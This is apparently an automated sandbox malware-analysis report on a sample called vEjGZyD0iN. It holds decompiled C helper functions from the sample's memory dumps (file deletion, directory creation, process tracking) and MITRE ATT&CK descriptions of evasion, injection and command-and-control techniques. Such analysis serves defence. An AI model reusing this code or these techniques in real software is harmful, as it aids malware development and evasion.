HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 013E849A

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememset
String ID:
API String ID: 1319286391-0
Opcode ID: a56696b7378ef52e07373181c0d952deb2ab0ead53f1a1c8c117f5554c5c8a6b
Instruction ID: eb31bdf23df5f3b3a3b03f8a178ac82edc28c64c41e1fbd03ca81abfc830568e
Opcode Fuzzy Hash: a56696b7378ef52e07373181c0d952deb2ab0ead53f1a1c8c117f5554c5c8a6b
Instruction Fuzzy Hash: AE01A533F006246BD7345AA99C0965EBAADDB88661F414275FD1CDB3C4EA21CC1086D1

Uniqueness

Uniqueness Score: -1.00%

Function 013E18D0, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E013E18D0() {
				short _v524;
				signed int _t14;
				signed char _t16;
				void* _t21;
				void* _t22;

				memset( &_v524, 0, 0x208);
				if( *0x13ec7c0 == 0) {
					L9:
					return 1;
				} else {
					_t21 = 0;
					do {
						_t2 = _t21 + 0x13ec7c0; // 0x0
						_t14 =  *_t2 & 0x0000ffff;
						_t21 = _t21 + 2;
						 *(_t22 + _t21 - 0x20a) = _t14;
						if(_t14 != 0x5c) {
							goto L8;
						} else {
							_t16 = GetFileAttributesW( &_v524);
							if(_t16 != 0xffffffff) {
								if((_t16 & 0x00000010) == 0) {
									goto L6;
								} else {
									goto L8;
								}
							} else {
								if(CreateDirectoryW( &_v524, 0) != 0 || GetLastError() == 0xb7) {
									goto L8;
								} else {
									L6:
									return 0;
								}
							}
						}
						goto L10;
						L8:
					} while ( *(_t21 + 0x13ec7c0) != 0);
					goto L9;
				}
				L10:
			}

0x013e18e8
0x013e18f9
0x013e195e
0x013e1967
0x013e18fb
0x013e18fb
0x013e1900
0x013e1900
0x013e1900
0x013e1907
0x013e190a
0x013e1915
0x00000000
0x013e1917
0x013e191e
0x013e1927
0x013e1952
0x00000000
0x00000000
0x00000000
0x00000000
0x013e1929
0x013e193a
0x00000000
0x013e1949
0x013e1949
0x013e194f
0x013e194f
0x013e193a
0x013e1927
0x00000000
0x013e1954
0x013e1954
0x00000000
0x013e1900
0x00000000

APIs

memset.NTDLL ref: 013E18E8
GetFileAttributesW.KERNEL32(?), ref: 013E191E
CreateDirectoryW.KERNEL32(?,00000000), ref: 013E1932
GetLastError.KERNEL32 ref: 013E193C

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: AttributesCreateDirectoryErrorFileLastmemset
String ID:
API String ID: 528582180-0
Opcode ID: 15100de7c6bdd4e9b05ab756a559b1141fa1535f33fc12409b829ac549a5edc3
Instruction ID: 33b26ecad8a5c7042a266dabd54d61260966ceab18648e34bf427f0ceff0ef69
Opcode Fuzzy Hash: 15100de7c6bdd4e9b05ab756a559b1141fa1535f33fc12409b829ac549a5edc3
Instruction Fuzzy Hash: 0C01D4329403295AEF709A68A84CBEE77ECEF04718F001655FA69E70C6E774E984C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 013E8B30, Relevance: 6.0, APIs: 4, Instructions: 46
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013E8B30(WCHAR* _a4, intOrPtr* _a8) {
				intOrPtr* _t14;
				intOrPtr* _t19;
				intOrPtr _t24;
				WCHAR* _t25;
				intOrPtr* _t26;

				_t25 = _a4;
				_t10 = _t25 + 0x24;
				_a4 = _t25 + 0x24;
				_t24 = E013E19E0(_t10);
				if( *((intOrPtr*)(_t25 + 0x18)) == GetCurrentProcessId()) {
					L8:
					return 1;
				}
				_t19 = _a8;
				_t14 =  *_t19;
				if(_t14 == 0) {
					L5:
					_t26 = RtlAllocateHeap(GetProcessHeap(), 8, 0x210);
					if(_t26 != 0) {
						_t8 = _t26 + 4; // 0x4
						lstrcpyW(_t8, _a4);
						 *((intOrPtr*)(_t26 + 0x20c)) = _t24;
						 *_t26 =  *_t19;
						 *_t19 = _t26;
					}
					L7:
					goto L8;
				}
				while( *((intOrPtr*)(_t14 + 0x20c)) != _t24) {
					_t14 =  *_t14;
					if(_t14 != 0) {
						continue;
					}
					goto L5;
				}
				goto L7;
			}

0x013e8b34
0x013e8b38
0x013e8b3d
0x013e8b45
0x013e8b50
0x013e8ba3
0x013e8baa
0x013e8baa
0x013e8b53
0x013e8b56
0x013e8b5a
0x013e8b6e
0x013e8b82
0x013e8b86
0x013e8b8b
0x013e8b8f
0x013e8b95
0x013e8b9d
0x013e8b9f
0x013e8b9f
0x013e8ba1
0x00000000
0x013e8ba1
0x013e8b60
0x013e8b68
0x013e8b6c
0x00000000
0x00000000
0x00000000
0x013e8b6c
0x00000000

APIs

GetCurrentProcessId.KERNEL32(00000000,00000000,?,013E215D,0000022C,00000000,?,?), ref: 013E8B47
GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,013E215D,0000022C,00000000,?,?), ref: 013E8B75
RtlAllocateHeap.NTDLL(00000000,?,013E215D), ref: 013E8B7C
lstrcpyW.KERNEL32(00000004,?), ref: 013E8B8F

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: HeapProcess$AllocateCurrentlstrcpy
String ID:
API String ID: 2952365268-0
Opcode ID: 82198ec37ef6c09f9ff9e6b1b3b0022e827c1422d41f6a35aa854a1f2e662dea
Instruction ID: b7766cc0c774e22671c30a0ad79642b17c59a1d2293aa08503ac455e0014954c
Opcode Fuzzy Hash: 82198ec37ef6c09f9ff9e6b1b3b0022e827c1422d41f6a35aa854a1f2e662dea
Instruction Fuzzy Hash: 92015E75A003259FDF308F69D888A9ABBE8FF54755F1485A9F945DB284D730E840CF90

Uniqueness

Uniqueness Score: -1.00%

Function 013E84C0, Relevance: 6.0, APIs: 4, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013E84C0(intOrPtr __ecx, void* __edx, long* _a4) {
				intOrPtr _v8;
				void* _t5;
				void* _t11;
				void* _t17;

				_t16 = _a4;
				_t11 = __edx;
				_v8 = __ecx;
				_t5 = RtlAllocateHeap(GetProcessHeap(), 0,  *_a4);
				_t17 = _t5;
				if(_t17 == 0) {
					return _t5;
				} else {
					if(E013E2D80(_t17, _t16, _v8, _t11) == 0) {
						return _t17;
					}
					HeapFree(GetProcessHeap(), 0, _t17);
					return 0;
				}
			}

0x013e84c9
0x013e84cc
0x013e84ce
0x013e84dc
0x013e84e2
0x013e84e6
0x013e851d
0x013e84e8
0x013e84fa
0x00000000
0x013e8515
0x013e8506
0x013e8514
0x013e8514

APIs

GetProcessHeap.KERNEL32(00000000,013E8668,?,?,?,013E8668,?), ref: 013E84D5
RtlAllocateHeap.NTDLL(00000000), ref: 013E84DC

Part of subcall function 013E2D80: memset.NTDLL ref: 013E2D94

GetProcessHeap.KERNEL32(00000000,00000000), ref: 013E84FF
HeapFree.KERNEL32(00000000), ref: 013E8506

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememset
String ID:
API String ID: 1319286391-0
Opcode ID: f263dc34841fddb2d2265aa8786b13530775c63060e9a45575551a7bb3ef0948
Instruction ID: 70d0b814262fdc9df889d17ab935bda92a48c441f35a140eb8515f56baa0901c
Opcode Fuzzy Hash: f263dc34841fddb2d2265aa8786b13530775c63060e9a45575551a7bb3ef0948
Instruction Fuzzy Hash: 9AF09632B003146BEA2056ED6C0D69EFBDCDF44667F040066FE08D6284E971DD1046E1

Uniqueness

Uniqueness Score: -1.00%

Function 013E1970, Relevance: 6.0, APIs: 4, Instructions: 31
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E013E1970() {
				void* _v8;
				short _v528;
				void* _t15;

				E013E1830(0x13e1010, 0x14, 0x41ce18c7,  &_v8);
				_t15 = _v8;
				 *0x13ec200( &_v528, 0x104, _t15, 0x13ec7c0, _t15);
				HeapFree(GetProcessHeap(), 0, _t15);
				return DeleteFileW( &_v528);
			}

0x013e198d
0x013e1992
0x013e19a8
0x013e19bb
0x013e19d2

APIs

Part of subcall function 013E1830: GetProcessHeap.KERNEL32(00000008,013E9F6B,00000000,00000000,013E1004,?,013E15F4,4DBAC13F,013E9F6B,?,00000000), ref: 013E1844
Part of subcall function 013E1830: RtlAllocateHeap.NTDLL(00000000,?,013E15F4), ref: 013E184B

_snwprintf.NTDLL ref: 013E19A8
GetProcessHeap.KERNEL32(00000000,013E9730), ref: 013E19B4
HeapFree.KERNEL32(00000000), ref: 013E19BB
DeleteFileW.KERNEL32(?), ref: 013E19C8

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateDeleteFileFree_snwprintf
String ID:
API String ID: 135842935-0
Opcode ID: 470bba2e20225f24d8b32d28a919a022f909df43622944cca3fd7e07831a664f
Instruction ID: 4671c7d0c7cb7967fed4d0241378bf7690474cb52d3380650301a38f0c5ea5eb
Opcode Fuzzy Hash: 470bba2e20225f24d8b32d28a919a022f909df43622944cca3fd7e07831a664f
Instruction Fuzzy Hash: 90F037B1901329BBDA30A7A59C0DFDF7FACEB05319F100191F919E61C6D6749A148BE1

Uniqueness

Uniqueness Score: -1.00%

Function 013EA750, Relevance: 6.0, APIs: 4, Instructions: 31
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013EA750(long __ecx) {
				int _t3;
				long _t7;
				void* _t9;
				void* _t10;

				_t10 =  *0x13ecbd4; // 0x0
				_t7 = __ecx;
				_t9 = 0x13ecbd4;
				while(_t10 != 0) {
					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
					if(_t3 == 0x102) {
						_t9 = _t10;
					} else {
						 *_t9 =  *_t10;
						CloseHandle( *(_t10 + 8));
						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
					}
					_t10 =  *_t9;
				}
				return _t3;
			}

0x013ea752
0x013ea758
0x013ea75b
0x013ea762
0x013ea768
0x013ea773
0x013ea794
0x013ea775
0x013ea777
0x013ea77c
0x013ea78c
0x013ea78c
0x013ea796
0x013ea798
0x013ea79f

APIs

WaitForSingleObject.KERNEL32(?,?,00000000,013E9315,00000000,013E928E), ref: 013EA768
CloseHandle.KERNEL32(?,?,00000000,013E9315,00000000,013E928E), ref: 013EA77C
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,013E9315,00000000,013E928E), ref: 013EA785
HeapFree.KERNEL32(00000000,?,00000000,013E9315,00000000,013E928E), ref: 013EA78C

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$CloseFreeHandleObjectProcessSingleWait
String ID:
API String ID: 1931067520-0
Opcode ID: a2cc65549701290ce5154b85be3243fafc99a9ea74fa9cfb13c9e5c20e225870
Instruction ID: fd5de593ac41b552c0661411218c3aa95b1ca58fd4c6a87f24c220dcbf010320
Opcode Fuzzy Hash: a2cc65549701290ce5154b85be3243fafc99a9ea74fa9cfb13c9e5c20e225870
Instruction Fuzzy Hash: 01F08C36544331AFEB325A98D84C96A7BFDEB44725B150415E942DB290C3709C808B90

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report vEjGZyD0iN

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Function 013E15B0, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 133
memorysynchronizationprocessCOMMON

Function 013E1599, Relevance: 15.1, APIs: 10, Instructions: 86
memorysynchronizationCOMMON

Function 013E1575, Relevance: 13.6, APIs: 9, Instructions: 73
memorysynchronizationCOMMON

Function 013E9EE0, Relevance: 9.0, APIs: 6, Instructions: 40
memoryCOMMON